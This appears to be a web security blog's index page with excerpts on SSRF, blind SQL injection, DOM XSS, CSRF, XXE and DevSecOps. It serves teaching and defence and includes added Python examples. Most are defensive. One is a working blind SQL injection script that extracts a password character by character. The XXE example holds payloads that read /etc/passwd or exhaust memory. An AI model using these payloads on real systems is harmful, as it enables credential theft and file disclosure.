Ctrl + Alt + Security

OWASP – Security Misconfiguration

Overview: Security misconfigurations are security controls that are inaccurately configured or left insecure, putting your systems and data at risk. They include poorly documented configuration changes, default settings left in place, and technical issues in any component of your endpoints. Security misconfigurations in web applications can be detected using the following test cases: 1)  EXPOSED FILES…


SSRF Explained

SSRF (Server-Side Request Forgery) occurs whenever a web application fetches a remote resource without validating the user-supplied URL. It allows an attacker to make the application send a specially crafted request to an unintended destination, even one protected by a firewall, VPN, or network access control list (ACL). As modern web applications provide end…
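The check the excerpt calls for, validating the user-supplied URL before the server fetches it, is shown below as an added example (not code from the original post). It refuses non-HTTP schemes and credentials in the authority, resolves the host and rejects any address that is not globally routable (loopback, RFC 1918, link-local such as the cloud metadata address, IPv4-mapped IPv6). The hostnames and the `FAKE_DNS` table are constructed fixtures so it runs offline; `resolve_all` is the real resolver you would pass in production.

```python
"""SSRF guard: vet a user-supplied URL before the server fetches it.

Added example, not code from the original post. Host names and FAKE_DNS
below are constructed fixtures for an offline demo."""
import ipaddress
import socket
from urllib.parse import urlparse

ALLOWED_SCHEMES = {"http", "https"}   # file://, gopher://, dict:// etc. are refused


def resolve_all(hostname):
    """Every address the name maps to (A and AAAA); a name may resolve to several."""
    infos = socket.getaddrinfo(hostname, None, proto=socket.IPPROTO_TCP)
    return {ipaddress.ip_address(info[4][0]) for info in infos}


def is_public_address(addr):
    """True only for globally routable unicast addresses."""
    # ::ffff:10.0.0.1 is the same host as 10.0.0.1; judge the embedded IPv4.
    if isinstance(addr, ipaddress.IPv6Address) and addr.ipv4_mapped is not None:
        addr = addr.ipv4_mapped
    return addr.is_global and not addr.is_multicast


def vet_url(url, resolver=resolve_all):
    """Return (ok, detail).

    On success detail is the sorted list of vetted IPs; connect to one of them
    directly (pinning) so a DNS rebind between this check and the fetch cannot
    swap in an internal address. On failure detail is the reason."""
    parts = urlparse(url)
    if parts.scheme.lower() not in ALLOWED_SCHEMES:
        return False, f"scheme {parts.scheme!r} not allowed"
    if parts.username is not None or parts.password is not None:
        return False, "credentials in the URL authority are not allowed"
    host = parts.hostname
    if not host:
        return False, "missing host"
    try:
        addrs = {ipaddress.ip_address(host)}      # literal IP: nothing to resolve
    except ValueError:
        try:
            addrs = resolver(host)
        except OSError as exc:
            return False, f"cannot resolve {host!r}: {exc}"
    bad = sorted(str(a) for a in addrs if not is_public_address(a))
    if bad:
        return False, f"host resolves to non-public address(es): {bad}"
    return True, sorted(str(a) for a in addrs)


# Constructed DNS fixture so the example runs offline.
FAKE_DNS = {
    "cdn.example.com": {"93.184.216.34"},
    "metadata.attacker.example": {"169.254.169.254"},        # attacker's name, internal target
    "dual.attacker.example": {"93.184.216.34", "10.0.0.5"},  # one public and one private record
}


def fake_resolver(hostname):
    if hostname not in FAKE_DNS:
        raise socket.gaierror(f"no such host: {hostname}")
    return {ipaddress.ip_address(a) for a in FAKE_DNS[hostname]}


if __name__ == "__main__":
    for candidate in ("https://cdn.example.com/img.png",
                      "http://metadata.attacker.example/",
                      "http://dual.attacker.example/",
                      "http://169.254.169.254/latest/meta-data/",
                      "http://[::ffff:127.0.0.1]/",
                      "http://user@cdn.example.com/",
                      "file:///etc/passwd"):
        print(candidate, "->", vet_url(candidate, fake_resolver))
```

Rejecting any name with even one non-public record closes the "dual" trick, where an attacker-controlled name returns a public address to the checker and a private one later. Redirects need the same treatment: either disable them on the outbound client or re-run `vet_url` on every `Location` before following it.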

blind sql injection

How to Perform Blind SQL Injection?

What is Blind SQL Injection? The word “Blind” here means that the application returns no error message or query output when it is hit with an injection payload, which makes the flaw harder to exploit. Information is instead extracted with SQL payloads that make the server return a ‘true or false’ response. By observing the response, an attacker can…
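To make the true/false extraction concrete, here is an added example (not code from the original post) against a constructed SQLite database. `user_exists_vulnerable` is the blind endpoint: it splices input into the query and reveals only whether a row matched. `extract_password` recovers the admin password from that single bit, one character at a time, using a binary search on the character's code point so each character costs about seven requests rather than one per candidate. `user_exists_safe` is the parameterised fix, against which the same attack recovers nothing.

```python
"""Boolean-based blind SQL injection against a true/false oracle.

Added example, not code from the original post. The table and passwords are
constructed fixtures (SQLite in memory)."""
import sqlite3


def build_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)",
                     [("alice", "s3cret!"), ("admin", "Tr0ub4dor")])
    return conn


def user_exists_vulnerable(conn, username):
    """VULNERABLE: input is spliced into the SQL text. Errors are swallowed, so
    the caller learns nothing but True/False, which is what makes it blind."""
    sql = f"SELECT 1 FROM users WHERE username = '{username}'"
    try:
        return conn.execute(sql).fetchone() is not None
    except sqlite3.Error:
        return False


def user_exists_safe(conn, username):
    """FIXED: a bound parameter is data, never SQL, so the payloads below are
    simply looked up as (non-existent) usernames."""
    row = conn.execute("SELECT 1 FROM users WHERE username = ?", (username,)).fetchone()
    return row is not None


def extract_password(oracle, user, max_len=64):
    """Recover `user`'s password through oracle(payload) -> bool.

    Payload shape: close the quote, add a condition, comment out the rest:
        admin' AND unicode(substr(password,<pos>,1))><mid>--
    unicode() and substr() are SQLite built-ins; comparing code points keeps
    the payload free of any quote characters from the secret itself."""
    recovered = ""
    for pos in range(1, max_len + 1):
        # Stop when the password has no character at this position.
        if not oracle(f"{user}' AND length(password)>={pos}-- "):
            break
        lo, hi = 32, 126            # printable ASCII; widen for other alphabets
        while lo < hi:              # invariant: the true code point is in [lo, hi]
            mid = (lo + hi) // 2
            if oracle(f"{user}' AND unicode(substr(password,{pos},1))>{mid}-- "):
                lo = mid + 1
            else:
                hi = mid
        recovered += chr(lo)
    return recovered


def attack(conn, endpoint):
    """Run the extraction against an endpoint; returns (secret, request_count)."""
    calls = 0

    def oracle(payload):
        nonlocal calls
        calls += 1
        return endpoint(conn, payload)

    return extract_password(oracle, "admin"), calls


if __name__ == "__main__":
    db = build_db()
    print("vulnerable endpoint leaked:", attack(db, user_exists_vulnerable))
    print("parameterised endpoint leaked:", attack(db, user_exists_safe))
```

Real targets add latency and noise, but the structure is the same: find one boolean (or time-based) signal, then turn it into a bit-by-bit oracle. The fix is the parameterised query; input filtering alone would not have stopped the quote-free code-point comparison above.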

mobile application security

Are your Apps Secure? An End to End Guide for Mobile Application Security

Mobile Application Security When we were an agrarian nation, all cars were trucks, because that’s what you needed on the farm. But as vehicles started to be used in the urban centers, cars got more popular … PCs are going to be like trucks. Less people are gonna need them and this is going to…


Ruby Based SQL Injection

Hi Readers, I sat down to pen a few notes on SQL Injection. Injection being the top category in OWASP’s Top 10, the definition and description of SQL Injection and many hands-on exercises are available online, one being PortSwigger Labs. I came across SQL injection in Ruby on Rails code, which made me want to share a few points regarding…

dom xss

A Beginner Guide to DOM Based XSS

What is DOM? DOM XSS stands for Document Object Model-based Cross-site Scripting. The DOM is the interface through which scripts access and manipulate a loaded web page. A DOM-based XSS attack is possible when client-side code writes attacker-controllable data (for example, part of the URL) into the DOM without proper sanitization or encoding. The attacker can manipulate that data to include XSS…

csrf attack

A Tale of Cross Site Request Forgery (CSRF)

What is CSRF? Cross-site request forgery (CSRF) is a common web security vulnerability. It’s also known as XSRF, Sea Surf, session riding, cross-site reference forgery, and hostile linking. A successful CSRF attack can have consequences serious enough that the Open Web Application Security Project (OWASP) included it in its 2013 Top 10 list. CSRF attack…
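The standard defence, a synchronizer token bound to the session plus an origin check, is shown below as an added example (not code from the original post). The browser attaches the victim's cookie to a request forged from another site, but the attacker's page cannot read the token out of the victim's page, and a token issued to the attacker's own session fails the HMAC check for the victim's session. `bank.example`, `evil.example` and the request dicts are constructed fixtures; `SERVER_KEY` stands in for a configured server-side secret.

```python
"""Session-bound synchronizer token CSRF defence.

Added example, not code from the original post. Origins, session ids and the
request dicts are constructed fixtures."""
import hashlib
import hmac
import os
import secrets
from urllib.parse import urlsplit

SITE_ORIGIN = "https://bank.example"
SERVER_KEY = os.urandom(32)          # stands in for a configured, persisted secret
SAFE_METHODS = {"GET", "HEAD", "OPTIONS"}


def issue_csrf_token(session_id, key=SERVER_KEY):
    """token = nonce.HMAC(key, session_id:nonce); rendered into a hidden form field."""
    nonce = secrets.token_hex(16)
    mac = hmac.new(key, f"{session_id}:{nonce}".encode(), hashlib.sha256).hexdigest()
    return f"{nonce}.{mac}"


def verify_csrf_token(session_id, token, key=SERVER_KEY):
    """Recompute the MAC for THIS session and compare in constant time."""
    if not isinstance(token, str) or "." not in token:
        return False
    nonce, mac = token.split(".", 1)
    expected = hmac.new(key, f"{session_id}:{nonce}".encode(), hashlib.sha256).hexdigest()
    return hmac.compare_digest(mac, expected)


def request_origin(headers):
    """Origin header if present, else the origin part of Referer, else None."""
    if headers.get("Origin"):
        return headers["Origin"]
    referer = headers.get("Referer")
    if referer:
        parts = urlsplit(referer)
        return f"{parts.scheme}://{parts.netloc}"
    return None


def allow_state_change(request, session_id):
    """Gate for POST/PUT/DELETE handlers: origin check, then session-bound token.

    `request` is a dict with 'method', 'headers' and 'form' (parsed body)."""
    if request["method"] in SAFE_METHODS:
        # Safe methods must never change state; if they do, no token can help.
        return True
    if request_origin(request["headers"]) != SITE_ORIGIN:
        return False                     # cross-site, or no origin information at all
    return verify_csrf_token(session_id, request["form"].get("csrf_token"))


def demo():
    """Three constructed requests for the victim's session: genuine, forged, replayed."""
    victim = "sess-victim-7f3a"
    cookie = {"Cookie": f"session={victim}"}
    token = issue_csrf_token(victim)

    # 1. Genuine form post from bank.example carrying the hidden token.
    genuine = {"method": "POST", "headers": {"Origin": SITE_ORIGIN, **cookie},
               "form": {"to": "alice", "amount": "10", "csrf_token": token}}
    # 2. Auto-submitting form on evil.example: the browser attaches the cookie,
    #    but Origin is the attacker's site and the token is missing.
    forged = {"method": "POST", "headers": {"Origin": "https://evil.example", **cookie},
              "form": {"to": "mallory", "amount": "9999"}}
    # 3. Token issued to the attacker's own session, replayed against the victim's
    #    (Origin set to the site so only the session binding is under test).
    replayed = {"method": "POST", "headers": {"Origin": SITE_ORIGIN, **cookie},
                "form": {"to": "mallory", "amount": "9999",
                         "csrf_token": issue_csrf_token("sess-attacker-0001")}}
    return (allow_state_change(genuine, victim),
            allow_state_change(forged, victim),
            allow_state_change(replayed, victim))


if __name__ == "__main__":
    print("genuine, forged, replayed ->", demo())
```

Rejecting requests that carry neither Origin nor Referer is the strict choice; some privacy tooling strips Referer, so expect a few false rejections and treat `SameSite` cookies as a second layer rather than a replacement for the token.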

XXE Attack

What are XXE(XML External Entity) Attacks?

What is XXE? XXE stands for XML External Entity. Before learning about XXE, let’s first look at how XML document types are defined and what a DTD is. What is DTD? DTD is the abbreviated form of Document Type Definition, which defines the structure and the permitted elements and attributes of an XML document.…
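Since the attack lives entirely inside the DTD, the simplest hardening for untrusted XML is to refuse any DOCTYPE before parsing. The added example below (not code from the original post) does that with the standard library's expat parser: it aborts at the DOCTYPE declaration, so no entity, external or internal, is ever defined or expanded. `XXE_PAYLOAD` and `LAUGHS_PAYLOAD` are constructed attack documents; the file path in the external entity is the classic illustration, not a real target.

```python
"""Refusing DTDs before parsing untrusted XML.

Added example, not code from the original post. The payloads are constructed
attack documents for the demo."""
import xml.etree.ElementTree as ET
import xml.parsers.expat as expat

# Constructed XXE payload: an external entity pointing at a local file.
XXE_PAYLOAD = b"""<?xml version="1.0"?>
<!DOCTYPE order [
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<order><item>&xxe;</item></order>"""

# Constructed entity-expansion ("billion laughs") payload: no external entity,
# just nested internal entities that blow up memory when expanded.
LAUGHS_PAYLOAD = b"""<?xml version="1.0"?>
<!DOCTYPE lolz [
  <!ENTITY lol "lol">
  <!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
  <!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;">
]>
<lolz>&lol2;</lolz>"""

BENIGN = b'<?xml version="1.0"?><order><item>widget</item></order>'


class DTDRejected(ValueError):
    """Raised when untrusted XML carries a DOCTYPE declaration."""


def reject_dtd(data):
    """Stream the bytes through expat; raise as soon as a DOCTYPE appears.

    The scan stops at the declaration itself, so the entities inside the DTD
    are never registered and nothing is fetched or expanded."""
    parser = expat.ParserCreate()

    def on_doctype(name, sysid, pubid, has_internal_subset):
        raise DTDRejected(f"DOCTYPE {name!r} refused (system id {sysid!r}, "
                          f"internal subset: {bool(has_internal_subset)})")

    parser.StartDoctypeDeclHandler = on_doctype
    parser.Parse(data, True)


def parse_untrusted(data):
    """Parse XML from an untrusted source: refuse any DTD, then parse normally."""
    reject_dtd(data)
    return ET.fromstring(data)


def classify(data):
    """Demo helper: 'ok', 'malformed', or the rejection reason."""
    try:
        parse_untrusted(data)
        return "ok"
    except DTDRejected as exc:
        return f"rejected: {exc}"
    except (expat.ExpatError, ET.ParseError):
        return "malformed"


if __name__ == "__main__":
    for label, doc in (("benign", BENIGN), ("xxe", XXE_PAYLOAD), ("laughs", LAUGHS_PAYLOAD)):
        print(f"{label:7s} -> {classify(doc)}")
```

Where an application genuinely needs DTDs (validation, legitimate internal entities), the alternative is to keep the DTD but disable external entity resolution and cap expansion; the defusedxml package wraps the standard-library parsers with exactly those settings.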


Kubernetes is Here & There

Today, container-based microservice architectures have drastically changed the way development and operations (DevOps) teams build, test and deploy applications. Containers help organizations scale and deploy applications on the fly, but they have also brought new challenges and complexity. Many businesses now deploy large numbers of containers daily as it…

DevSecOps Pipeline

DevSecOps is a culture shift in the IT industry that aims to integrate security into the rapid software release cycles that characterize modern application development and deployment (DevOps). Embracing this shift-left methodology requires organizations to bridge the gap between developers and security analysts to the point where…